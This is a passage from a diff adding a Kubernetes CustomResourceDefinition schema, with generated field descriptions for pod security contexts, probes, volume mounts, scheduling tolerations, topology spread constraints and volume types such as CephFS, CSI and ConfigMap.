SELinux context to be applied + to the container. If unspecified, the container + runtime will allocate a random SELinux context + for each container. May also be set in PodSecurityContext. If + set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. + properties: + level: + description: Level is SELinux level label + that applies to the container. + type: string + role: + description: Role is a SELinux role label + that applies to the container. + type: string + type: + description: Type is a SELinux type label + that applies to the container. + type: string + user: + description: User is a SELinux user label + that applies to the container. + type: string + type: object + seccompProfile: + description: The seccomp options to use by this + container. If seccomp options are provided + at both the pod & container level, the container + options override the pod options. + properties: + localhostProfile: + description: localhostProfile indicates + a profile defined in a file on the node + should be used. The profile must be preconfigured + on the node to work. Must be a descending + path, relative to the kubelet's configured + seccomp profile location. Must only be + set if type is "Localhost". + type: string + type: + description: "type indicates which kind + of seccomp profile will be applied. Valid + options are: \n Localhost - a profile + defined in a file on the node should be + used. RuntimeDefault - the container runtime + default profile should be used. Unconfined + - no profile should be applied." + type: string + required: + - type + type: object + windowsOptions: + description: The Windows specific settings applied + to all containers. If unspecified, the options + from the PodSecurityContext will be used. + If set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. + properties: + gmsaCredentialSpec: + description: GMSACredentialSpec is where + the GMSA admission webhook (https://github.com/kubernetes-sigs/windows-gmsa) + inlines the contents of the GMSA credential + spec named by the GMSACredentialSpecName + field. + type: string + gmsaCredentialSpecName: + description: GMSACredentialSpecName is the + name of the GMSA credential spec to use. + type: string + hostProcess: + description: HostProcess determines if a + container should be run as a 'Host Process' + container. This field is alpha-level and + will only be honored by components that + enable the WindowsHostProcessContainers + feature flag. Setting this field without + the feature flag will result in errors + when validating the Pod. All of a Pod's + containers must have the same effective + HostProcess value (it is not allowed to + have a mix of HostProcess containers and + non-HostProcess containers). In addition, + if HostProcess is true then HostNetwork + must also be set to true. + type: boolean + runAsUserName: + description: The UserName in Windows to + run the entrypoint of the container process. + Defaults to the user specified in image + metadata if unspecified. May also be set + in PodSecurityContext. If set in both + SecurityContext and PodSecurityContext, + the value specified in SecurityContext + takes precedence. + type: string + type: object + type: object + startupProbe: + description: 'StartupProbe indicates that the Pod + has successfully initialized. If specified, no + other probes are executed until this completes + successfully. If this probe fails, the Pod will + be restarted, just as if the livenessProbe failed. + This can be used to provide different probe parameters + at the beginning of a Pod''s lifecycle, when it + might take a long time to load data or warm a + cache, than during steady-state operation. This + cannot be updated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the action + to take. + properties: + command: + description: Command is the command line + to execute inside the container, the working + directory for the command is root ('/') + in the container's filesystem. The command + is simply exec'd, it is not run inside + a shell, so traditional shell instructions + ('|', etc) won't work. To use a shell, + you need to explicitly call out to that + shell. Exit status of 0 is treated as + live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for + the probe to be considered failed after having + succeeded. Defaults to 3. Minimum value is + 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request + to perform. + properties: + host: + description: Host name to connect to, defaults + to the pod IP. You probably want to set + "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the + request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom + header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container + has started before liveness probes are initiated. + More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform + the probe. Default to 10 seconds. Minimum + value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for + the probe to be considered successful after + having failed. Defaults to 1. Must be 1 for + liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet supported + TODO: implement a realistic TCP lifecycle + hook' + properties: + host: + description: 'Optional: Host name to connect + to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the + pod needs to terminate gracefully upon probe + failure. The grace period is the duration + in seconds after the processes running in + the pod are sent a termination signal and + the time when the processes are forcibly halted + with a kill signal. Set this value longer + than the expected cleanup time for your process. + If this value is nil, the pod's terminationGracePeriodSeconds + will be used. Otherwise, this value overrides + the value provided by the pod spec. Value + must be non-negative integer. The value zero + indicates stop immediately via the kill signal + (no opportunity to shut down). This is a beta + field and requires enabling ProbeTerminationGracePeriod + feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds + is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which + the probe times out. Defaults to 1 second. + Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + stdin: + description: Whether this container should allocate + a buffer for stdin in the container runtime. If + this is not set, reads from stdin in the container + will always result in EOF. Default is false. + type: boolean + stdinOnce: + description: Whether the container runtime should + close the stdin channel after it has been opened + by a single attach. When stdin is true the stdin + stream will remain open across multiple attach + sessions. If stdinOnce is set to true, stdin is + opened on container start, is empty until the + first client attaches to stdin, and then remains + open and accepts data until the client disconnects, + at which time stdin is closed and remains closed + until the container is restarted. If this flag + is false, a container processes that reads from + stdin will never receive an EOF. Default is false + type: boolean + terminationMessagePath: + description: 'Optional: Path at which the file to + which the container''s termination message will + be written is mounted into the container''s filesystem. + Message written is intended to be brief final + status, such as an assertion failure message. + Will be truncated by the node if greater than + 4096 bytes. The total message length across all + containers will be limited to 12kb. Defaults to + /dev/termination-log. Cannot be updated.' + type: string + terminationMessagePolicy: + description: Indicate how the termination message + should be populated. File will use the contents + of terminationMessagePath to populate the container + status message on both success and failure. FallbackToLogsOnError + will use the last chunk of container log output + if the termination message file is empty and the + container exited with an error. The log output + is limited to 2048 bytes or 80 lines, whichever + is smaller. Defaults to File. Cannot be updated. + type: string + tty: + description: Whether this container should allocate + a TTY for itself, also requires 'stdin' to be + true. Default is false. + type: boolean + volumeDevices: + description: volumeDevices is the list of block + devices to be used by the container. + items: + description: volumeDevice describes a mapping + of a raw block device within a container. + properties: + devicePath: + description: devicePath is the path inside + of the container that the device will be + mapped to. + type: string + name: + description: name must match the name of a + persistentVolumeClaim in the pod + type: string + required: + - devicePath + - name + type: object + type: array + volumeMounts: + description: Pod volumes to mount into the container's + filesystem. Cannot be updated. + items: + description: VolumeMount describes a mounting + of a Volume within a container. + properties: + mountPath: + description: Path within the container at + which the volume should be mounted. Must + not contain ':'. + type: string + mountPropagation: + description: mountPropagation determines how + mounts are propagated from the host to container + and the other way around. When not set, + MountPropagationNone is used. This field + is beta in 1.10. + type: string + name: + description: This must match the Name of a + Volume. + type: string + readOnly: + description: Mounted read-only if true, read-write + otherwise (false or unspecified). Defaults + to false. + type: boolean + subPath: + description: Path within the volume from which + the container's volume should be mounted. + Defaults to "" (volume's root). + type: string + subPathExpr: + description: Expanded path within the volume + from which the container's volume should + be mounted. Behaves similarly to SubPath + but environment variable references $(VAR_NAME) + are expanded using the container's environment. + Defaults to "" (volume's root). SubPathExpr + and SubPath are mutually exclusive. + type: string + required: + - mountPath + - name + type: object + type: array + workingDir: + description: Container's working directory. If not + specified, the container runtime's default will + be used, which might be configured in the container + image. Cannot be updated. + type: string + required: + - name + type: object + type: array + nodeName: + description: NodeName is a request to schedule this pod + onto a specific node. If it is non-empty, the scheduler + simply schedules this pod onto that node, assuming that + it fits resource requirements. + type: string + nodeSelector: + additionalProperties: + type: string + description: 'NodeSelector is a selector which must be + true for the pod to fit on a node. Selector which must + match a node''s labels for the pod to be scheduled on + that node. More info: https://kubernetes.io/docs/concepts/configuration/assign-pod-node/' + type: object + x-kubernetes-map-type: atomic + overhead: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Overhead represents the resource overhead + associated with running a pod for a given RuntimeClass. + This field will be autopopulated at admission time by + the RuntimeClass admission controller. If the RuntimeClass + admission controller is enabled, overhead must not be + set in Pod create requests. The RuntimeClass admission + controller will reject Pod create requests which have + the overhead already set. If RuntimeClass is configured + and selected in the PodSpec, Overhead will be set to + the value defined in the corresponding RuntimeClass, + otherwise it will remain unset and treated as zero. + More info: https://git.k8s.io/enhancements/keps/sig-node/688-pod-overhead/README.md + This field is beta-level as of Kubernetes v1.18, and + is only honored by servers that enable the PodOverhead + feature.' + type: object + preemptionPolicy: + description: PreemptionPolicy is the Policy for preempting + pods with lower priority. One of Never, PreemptLowerPriority. + Defaults to PreemptLowerPriority if unset. This field + is beta-level, gated by the NonPreemptingPriority feature-gate. + type: string + priority: + description: The priority value. Various system components + use this field to find the priority of the pod. When + Priority Admission Controller is enabled, it prevents + users from setting this field. The admission controller + populates this field from PriorityClassName. The higher + the value, the higher the priority. + format: int32 + type: integer + priorityClassName: + description: If specified, indicates the pod's priority. + "system-node-critical" and "system-cluster-critical" + are two special keywords which indicate the highest + priorities with the former being the highest priority. + Any other name must be defined by creating a PriorityClass + object with that name. If not specified, the pod priority + will be default or zero if there is no default. + type: string + readinessGates: + description: 'If specified, all readiness gates will be + evaluated for pod readiness. A pod is ready when all + its containers are ready AND all conditions specified + in the readiness gates have status equal to "True" More + info: https://git.k8s.io/enhancements/keps/sig-network/580-pod-readiness-gates' + items: + description: PodReadinessGate contains the reference + to a pod condition + properties: + conditionType: + description: ConditionType refers to a condition + in the pod's condition list with matching type. + type: string + required: + - conditionType + type: object + type: array + restartPolicy: + description: 'Restart policy for all containers within + the pod. One of Always, OnFailure, Never. Default to + Always. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#restart-policy' + type: string + runtimeClassName: + description: 'RuntimeClassName refers to a RuntimeClass + object in the node.k8s.io group, which should be used + to run this pod. If no RuntimeClass resource matches + the named class, the pod will not be run. If unset or + empty, the "legacy" RuntimeClass will be used, which + is an implicit class with an empty definition that uses + the default runtime handler. More info: https://git.k8s.io/enhancements/keps/sig-node/585-runtime-class + This is a beta feature as of Kubernetes v1.14.' + type: string + schedulerName: + description: If specified, the pod will be dispatched + by specified scheduler. If not specified, the pod will + be dispatched by default scheduler. + type: string + securityContext: + description: 'SecurityContext holds pod-level security + attributes and common container settings. Optional: + Defaults to empty. See type description for default + values of each field.' + properties: + fsGroup: + description: "A special supplemental group that applies + to all containers in a pod. Some volume types allow + the Kubelet to change the ownership of that volume + to be owned by the pod: \n 1. The owning GID will + be the FSGroup 2. The setgid bit is set (new files + created in the volume will be owned by FSGroup) + 3. The permission bits are OR'd with rw-rw---- \n + If unset, the Kubelet will not modify the ownership + and permissions of any volume." + format: int64 + type: integer + fsGroupChangePolicy: + description: 'fsGroupChangePolicy defines behavior + of changing ownership and permission of the volume + before being exposed inside Pod. This field will + only apply to volume types which support fsGroup + based ownership(and permissions). It will have no + effect on ephemeral volume types such as: secret, + configmaps and emptydir. Valid values are "OnRootMismatch" + and "Always". If not specified, "Always" is used.' + type: string + runAsGroup: + description: The GID to run the entrypoint of the + container process. Uses runtime default if unset. + May also be set in SecurityContext. If set in both + SecurityContext and PodSecurityContext, the value + specified in SecurityContext takes precedence for + that container. + format: int64 + type: integer + runAsNonRoot: + description: Indicates that the container must run + as a non-root user. If true, the Kubelet will validate + the image at runtime to ensure that it does not + run as UID 0 (root) and fail to start the container + if it does. If unset or false, no such validation + will be performed. May also be set in SecurityContext. If + set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes precedence. + type: boolean + runAsUser: + description: The UID to run the entrypoint of the + container process. Defaults to user specified in + image metadata if unspecified. May also be set in + SecurityContext. If set in both SecurityContext + and PodSecurityContext, the value specified in SecurityContext + takes precedence for that container. + format: int64 + type: integer + seLinuxOptions: + description: The SELinux context to be applied to + all containers. If unspecified, the container runtime + will allocate a random SELinux context for each + container. May also be set in SecurityContext. If + set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes precedence + for that container. + properties: + level: + description: Level is SELinux level label that + applies to the container. + type: string + role: + description: Role is a SELinux role label that + applies to the container. + type: string + type: + description: Type is a SELinux type label that + applies to the container. + type: string + user: + description: User is a SELinux user label that + applies to the container. + type: string + type: object + seccompProfile: + description: The seccomp options to use by the containers + in this pod. + properties: + localhostProfile: + description: localhostProfile indicates a profile + defined in a file on the node should be used. + The profile must be preconfigured on the node + to work. Must be a descending path, relative + to the kubelet's configured seccomp profile + location. Must only be set if type is "Localhost". + type: string + type: + description: "type indicates which kind of seccomp + profile will be applied. Valid options are: + \n Localhost - a profile defined in a file on + the node should be used. RuntimeDefault - the + container runtime default profile should be + used. Unconfined - no profile should be applied." + type: string + required: + - type + type: object + supplementalGroups: + description: A list of groups applied to the first + process run in each container, in addition to the + container's primary GID. If unspecified, no groups + will be added to any container. + items: + format: int64 + type: integer + type: array + sysctls: + description: Sysctls hold a list of namespaced sysctls + used for the pod. Pods with unsupported sysctls + (by the container runtime) might fail to launch. + items: + description: Sysctl defines a kernel parameter to + be set + properties: + name: + description: Name of a property to set + type: string + value: + description: Value of a property to set + type: string + required: + - name + - value + type: object + type: array + windowsOptions: + description: The Windows specific settings applied + to all containers. If unspecified, the options within + a container's SecurityContext will be used. If set + in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes precedence. + properties: + gmsaCredentialSpec: + description: GMSACredentialSpec is where the GMSA + admission webhook (https://github.com/kubernetes-sigs/windows-gmsa) + inlines the contents of the GMSA credential + spec named by the GMSACredentialSpecName field. + type: string + gmsaCredentialSpecName: + description: GMSACredentialSpecName is the name + of the GMSA credential spec to use. + type: string + hostProcess: + description: HostProcess determines if a container + should be run as a 'Host Process' container. + This field is alpha-level and will only be honored + by components that enable the WindowsHostProcessContainers + feature flag. Setting this field without the + feature flag will result in errors when validating + the Pod. All of a Pod's containers must have + the same effective HostProcess value (it is + not allowed to have a mix of HostProcess containers + and non-HostProcess containers). In addition, + if HostProcess is true then HostNetwork must + also be set to true. + type: boolean + runAsUserName: + description: The UserName in Windows to run the + entrypoint of the container process. Defaults + to the user specified in image metadata if unspecified. + May also be set in PodSecurityContext. If set + in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. + type: string + type: object + type: object + serviceAccount: + description: 'DeprecatedServiceAccount is a depreciated + alias for ServiceAccountName. Deprecated: Use serviceAccountName + instead.' + type: string + serviceAccountName: + description: 'ServiceAccountName is the name of the ServiceAccount + to use to run this pod. More info: https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/' + type: string + setHostnameAsFQDN: + description: If true the pod's hostname will be configured + as the pod's FQDN, rather than the leaf name (the default). + In Linux containers, this means setting the FQDN in + the hostname field of the kernel (the nodename field + of struct utsname). In Windows containers, this means + setting the registry value of hostname for the registry + key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters + to FQDN. If a pod does not have FQDN, this has no effect. + Default to false. + type: boolean + shareProcessNamespace: + description: 'Share a single process namespace between + all of the containers in a pod. When this is set containers + will be able to view and signal processes from other + containers in the same pod, and the first process in + each container will not be assigned PID 1. HostPID and + ShareProcessNamespace cannot both be set. Optional: + Default to false.' + type: boolean + subdomain: + description: If specified, the fully qualified Pod hostname + will be "...svc.". If not specified, the pod will not have a + domainname at all. + type: string + terminationGracePeriodSeconds: + description: Optional duration in seconds the pod needs + to terminate gracefully. May be decreased in delete + request. Value must be non-negative integer. The value + zero indicates stop immediately via the kill signal + (no opportunity to shut down). If this value is nil, + the default grace period will be used instead. The grace + period is the duration in seconds after the processes + running in the pod are sent a termination signal and + the time when the processes are forcibly halted with + a kill signal. Set this value longer than the expected + cleanup time for your process. Defaults to 30 seconds. + format: int64 + type: integer + tolerations: + description: If specified, the pod's tolerations. + items: + description: The pod this Toleration is attached to + tolerates any taint that matches the triple + using the matching operator . + properties: + effect: + description: Effect indicates the taint effect to + match. Empty means match all taint effects. When + specified, allowed values are NoSchedule, PreferNoSchedule + and NoExecute. + type: string + key: + description: Key is the taint key that the toleration + applies to. Empty means match all taint keys. + If the key is empty, operator must be Exists; + this combination means to match all values and + all keys. + type: string + operator: + description: Operator represents a key's relationship + to the value. Valid operators are Exists and Equal. + Defaults to Equal. Exists is equivalent to wildcard + for value, so that a pod can tolerate all taints + of a particular category. + type: string + tolerationSeconds: + description: TolerationSeconds represents the period + of time the toleration (which must be of effect + NoExecute, otherwise this field is ignored) tolerates + the taint. By default, it is not set, which means + tolerate the taint forever (do not evict). Zero + and negative values will be treated as 0 (evict + immediately) by the system. + format: int64 + type: integer + value: + description: Value is the taint value the toleration + matches to. If the operator is Exists, the value + should be empty, otherwise just a regular string. + type: string + type: object + type: array + topologySpreadConstraints: + description: TopologySpreadConstraints describes how a + group of pods ought to spread across topology domains. + Scheduler will schedule pods in a way which abides by + the constraints. All topologySpreadConstraints are ANDed. + items: + description: TopologySpreadConstraint specifies how + to spread matching pods among the given topology. + properties: + labelSelector: + description: LabelSelector is used to find matching + pods. Pods that match this label selector are + counted to determine the number of pods in their + corresponding topology domain. + properties: + matchExpressions: + description: matchExpressions is a list of label + selector requirements. The requirements are + ANDed. + items: + description: A label selector requirement + is a selector that contains values, a key, + and an operator that relates the key and + values. + properties: + key: + description: key is the label key that + the selector applies to. + type: string + operator: + description: operator represents a key's + relationship to a set of values. Valid + operators are In, NotIn, Exists and + DoesNotExist. + type: string + values: + description: values is an array of string + values. If the operator is In or NotIn, + the values array must be non-empty. + If the operator is Exists or DoesNotExist, + the values array must be empty. This + array is replaced during a strategic + merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of {key,value} + pairs. A single {key,value} in the matchLabels + map is equivalent to an element of matchExpressions, + whose key field is "key", the operator is + "In", and the values array contains only "value". + The requirements are ANDed. + type: object + type: object + maxSkew: + description: 'MaxSkew describes the degree to which + pods may be unevenly distributed. When `whenUnsatisfiable=DoNotSchedule`, + it is the maximum permitted difference between + the number of matching pods in the target topology + and the global minimum. For example, in a 3-zone + cluster, MaxSkew is set to 1, and pods with the + same labelSelector spread as 1/1/0: | zone1 | + zone2 | zone3 | | P | P | | - if + MaxSkew is 1, incoming pod can only be scheduled + to zone3 to become 1/1/1; scheduling it onto zone1(zone2) + would make the ActualSkew(2-0) on zone1(zone2) + violate MaxSkew(1). - if MaxSkew is 2, incoming + pod can be scheduled onto any zone. When `whenUnsatisfiable=ScheduleAnyway`, + it is used to give higher precedence to topologies + that satisfy it. It''s a required field. Default + value is 1 and 0 is not allowed.' + format: int32 + type: integer + topologyKey: + description: TopologyKey is the key of node labels. + Nodes that have a label with this key and identical + values are considered to be in the same topology. + We consider each as a "bucket", and + try to put balanced number of pods into each bucket. + It's a required field. + type: string + whenUnsatisfiable: + description: 'WhenUnsatisfiable indicates how to + deal with a pod if it doesn''t satisfy the spread + constraint. - DoNotSchedule (default) tells the + scheduler not to schedule it. - ScheduleAnyway + tells the scheduler to schedule the pod in any + location, but giving higher precedence to topologies + that would help reduce the skew. A constraint + is considered "Unsatisfiable" for an incoming + pod if and only if every possible node assigment + for that pod would violate "MaxSkew" on some topology. + For example, in a 3-zone cluster, MaxSkew is set + to 1, and pods with the same labelSelector spread + as 3/1/1: | zone1 | zone2 | zone3 | | P P P | P | P | + If WhenUnsatisfiable is set to DoNotSchedule, + incoming pod can only be scheduled to zone2(zone3) + to become 3/2/1(3/1/2) as ActualSkew(2-1) on zone2(zone3) + satisfies MaxSkew(1). In other words, the cluster + can still be imbalanced, but scheduler won''t + make it *more* imbalanced. It''s a required field.' + type: string + required: + - maxSkew + - topologyKey + - whenUnsatisfiable + type: object + type: array + x-kubernetes-list-map-keys: + - topologyKey + - whenUnsatisfiable + x-kubernetes-list-type: map + volumes: + description: 'List of volumes that can be mounted by containers + belonging to the pod. More info: https://kubernetes.io/docs/concepts/storage/volumes' + items: + description: Volume represents a named volume in a pod + that may be accessed by any container in the pod. + properties: + awsElasticBlockStore: + description: 'AWSElasticBlockStore represents an + AWS Disk resource that is attached to a kubelet''s + host machine and then exposed to the pod. More + info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore' + properties: + fsType: + description: 'Filesystem type of the volume + that you want to mount. Tip: Ensure that the + filesystem type is supported by the host operating + system. Examples: "ext4", "xfs", "ntfs". Implicitly + inferred to be "ext4" if unspecified. More + info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore + TODO: how do we prevent errors in the filesystem + from compromising the machine' + type: string + partition: + description: 'The partition in the volume that + you want to mount. If omitted, the default + is to mount by volume name. Examples: For + volume /dev/sda1, you specify the partition + as "1". Similarly, the volume partition for + /dev/sda is "0" (or you can leave the property + empty).' + format: int32 + type: integer + readOnly: + description: 'Specify "true" to force and set + the ReadOnly property in VolumeMounts to "true". + If omitted, the default is "false". More info: + https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore' + type: boolean + volumeID: + description: 'Unique ID of the persistent disk + resource in AWS (Amazon EBS volume). More + info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore' + type: string + required: + - volumeID + type: object + azureDisk: + description: AzureDisk represents an Azure Data + Disk mount on the host and bind mount to the pod. + properties: + cachingMode: + description: 'Host Caching mode: None, Read + Only, Read Write.' + type: string + diskName: + description: The Name of the data disk in the + blob storage + type: string + diskURI: + description: The URI the data disk in the blob + storage + type: string + fsType: + description: Filesystem type to mount. Must + be a filesystem type supported by the host + operating system. Ex. "ext4", "xfs", "ntfs". + Implicitly inferred to be "ext4" if unspecified. + type: string + kind: + description: 'Expected values Shared: multiple + blob disks per storage account Dedicated: + single blob disk per storage account Managed: + azure managed data disk (only in managed availability + set). defaults to shared' + type: string + readOnly: + description: Defaults to false (read/write). + ReadOnly here will force the ReadOnly setting + in VolumeMounts. + type: boolean + required: + - diskName + - diskURI + type: object + azureFile: + description: AzureFile represents an Azure File + Service mount on the host and bind mount to the + pod. + properties: + readOnly: + description: Defaults to false (read/write). + ReadOnly here will force the ReadOnly setting + in VolumeMounts. + type: boolean + secretName: + description: the name of secret that contains + Azure Storage Account Name and Key + type: string + shareName: + description: Share Name + type: string + required: + - secretName + - shareName + type: object + cephfs: + description: CephFS represents a Ceph FS mount on + the host that shares a pod's lifetime + properties: + monitors: + description: 'Required: Monitors is a collection + of Ceph monitors More info: https://examples.k8s.io/volumes/cephfs/README.md#how-to-use-it' + items: + type: string + type: array + path: + description: 'Optional: Used as the mounted + root, rather than the full Ceph tree, default + is /' + type: string + readOnly: + description: 'Optional: Defaults to false (read/write). + ReadOnly here will force the ReadOnly setting + in VolumeMounts. More info: https://examples.k8s.io/volumes/cephfs/README.md#how-to-use-it' + type: boolean + secretFile: + description: 'Optional: SecretFile is the path + to key ring for User, default is /etc/ceph/user.secret + More info: https://examples.k8s.io/volumes/cephfs/README.md#how-to-use-it' + type: string + secretRef: + description: 'Optional: SecretRef is reference + to the authentication secret for User, default + is empty. More info: https://examples.k8s.io/volumes/cephfs/README.md#how-to-use-it' + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + type: object + user: + description: 'Optional: User is the rados user + name, default is admin More info: https://examples.k8s.io/volumes/cephfs/README.md#how-to-use-it' + type: string + required: + - monitors + type: object + cinder: + description: 'Cinder represents a cinder volume + attached and mounted on kubelets host machine. + More info: https://examples.k8s.io/mysql-cinder-pd/README.md' + properties: + fsType: + description: 'Filesystem type to mount. Must + be a filesystem type supported by the host + operating system. Examples: "ext4", "xfs", + "ntfs". Implicitly inferred to be "ext4" if + unspecified. More info: https://examples.k8s.io/mysql-cinder-pd/README.md' + type: string + readOnly: + description: 'Optional: Defaults to false (read/write). + ReadOnly here will force the ReadOnly setting + in VolumeMounts. More info: https://examples.k8s.io/mysql-cinder-pd/README.md' + type: boolean + secretRef: + description: 'Optional: points to a secret object + containing parameters used to connect to OpenStack.' + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + type: object + volumeID: + description: 'volume id used to identify the + volume in cinder. More info: https://examples.k8s.io/mysql-cinder-pd/README.md' + type: string + required: + - volumeID + type: object + configMap: + description: ConfigMap represents a configMap that + should populate this volume + properties: + defaultMode: + description: 'Optional: mode bits used to set + permissions on created files by default. Must + be an octal value between 0000 and 0777 or + a decimal value between 0 and 511. YAML accepts + both octal and decimal values, JSON requires + decimal values for mode bits. Defaults to + 0644. Directories within the path are not + affected by this setting. This might be in + conflict with other options that affect the + file mode, like fsGroup, and the result can + be other mode bits set.' + format: int32 + type: integer + items: + description: If unspecified, each key-value + pair in the Data field of the referenced ConfigMap + will be projected into the volume as a file + whose name is the key and content is the value. + If specified, the listed keys will be projected + into the specified paths, and unlisted keys + will not be present. If a key is specified + which is not present in the ConfigMap, the + volume setup will error unless it is marked + optional. Paths must be relative and may not + contain the '..' path or start with '..'. + items: + description: Maps a string key to a path within + a volume. + properties: + key: + description: The key to project. + type: string + mode: + description: 'Optional: mode bits used + to set permissions on this file. Must + be an octal value between 0000 and 0777 + or a decimal value between 0 and 511. + YAML accepts both octal and decimal + values, JSON requires decimal values + for mode bits. If not specified, the + volume defaultMode will be used. This + might be in conflict with other options + that affect the file mode, like fsGroup, + and the result can be other mode bits + set.' + format: int32 + type: integer + path: + description: The relative path of the + file to map the key to. May not be an + absolute path. May not contain the path + element '..'. May not start with the + string '..'. + type: string + required: + - key + - path + type: object + type: array + name: + description: 'Name of the referent. More info: + https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap or + its keys must be defined + type: boolean + type: object + csi: + description: CSI (Container Storage Interface) represents + ephemeral storage that is handled by certain external + CSI drivers (Beta feature). + properties: + driver: + description: Driver is the name of the CSI driver + that handles this volume. Consult with your + admin for the correct name as registered in + the cluster. + type: string + fsType: + description: Filesystem type to mount. Ex. "ext4", + "xfs", "ntfs". If not provided, the empty + value is passed to the associated CSI driver + which will determine the default filesystem + to apply. + type: string + nodePublishSecretRef: + description: NodePublishSecretRef is a reference + to the secret object containing sensitive + information to pass to the CSI driver to complete + the CSI NodePublishVolume and NodeUnpublishVolume + calls. This field is optional, and may be + empty if no secret is required. If the secret + object contains more than one secret, all + secret references are passed. + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + type: object + readOnly: + description: Specifies a read-only configuration + for the volume. Defaults to false (read/write). + type: boolean + volumeAttributes: + additionalProperties: + type: string + description: VolumeAttributes stores driver-specific + properties that are passed to the CSI driver. + Consult your driver's documentation for supported + values. + type: object + required: + - driver + type: object + downwardAPI: + description: DownwardAPI represents downward API + about the pod that should populate this volume + properties: + defaultMode: + description: 'Optional: mode bits to use on + created files by default. Must be a Optional: + mode bits used to set permissions on created + files by default. Must be an octal value between + 0000 and 0777 or a decimal value between 0 + and 511. YAML accepts both octal and decimal + values, JSON requires decimal values for mode + bits. Defaults to 0644. Directories within + the path are not affected by this setting. + This might be in conflict with other options + that affect the file mode, like fsGroup, and + the result can be other mode bits set.' + format: int32 + type: integer + items: + description: Items is a list of downward API + volume file + items: + description: DownwardAPIVolumeFile represents + information to create the file containing + the pod field + properties: + fieldRef: + description: 'Required: Selects a field + of the pod: only annotations, labels, + name and namespace are supported.' + properties: + apiVersion: + description: Version of the schema + the FieldPath is written in terms + of, defaults to "v1". + type: string + fieldPath: + description: Path of the field to + select in the specified API version. + type: string + required: + - fieldPath + type: object + mode: + description: 'Optional: mode bits used + to set permissions on this file, must + be an octal value between 0000 and 0777 + or a decimal value between 0 and 511. + YAML accepts both octal and decimal + values, JSON requires decimal values + for mode bits. If not specified, the + volume defaultMode will be used. This + might be in conflict with other options + that affect the file mode, like fsGroup, + and the result can be other mode bits + set.' + format: int32 + type: integer + path: + description: 'Required: Path is the relative + path name of the file to be created. + Must not be absolute or contain the + ''..'' path. Must be utf-8 encoded. + The first item of the relative path + must not start with ''..''' + type: string + resourceFieldRef: + description: 'Selects a resource of the + container: only resources limits and + requests (limits.cpu, limits.memory, + requests.cpu and requests.memory) are + currently supported.' + properties: + containerName: + description: 'Container name: required + for volumes, optional for env vars' + type: string + divisor: + anyOf: + - type: integer + - type: string + description: Specifies the output + format of the exposed resources, + defaults to "1" + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + resource: + description: 'Required: resource to + select' + type: string + required: + - resource + type: object + required: + - path + type: object + type: array + type: object + emptyDir: + description: 'EmptyDir represents a temporary directory + that shares a pod''s lifetime. More info: https://kubernetes.io/docs/concepts/storage/volumes#emptydir' + properties: + medium: + description: 'What type of storage medium should + back this directory. The default is "" which + 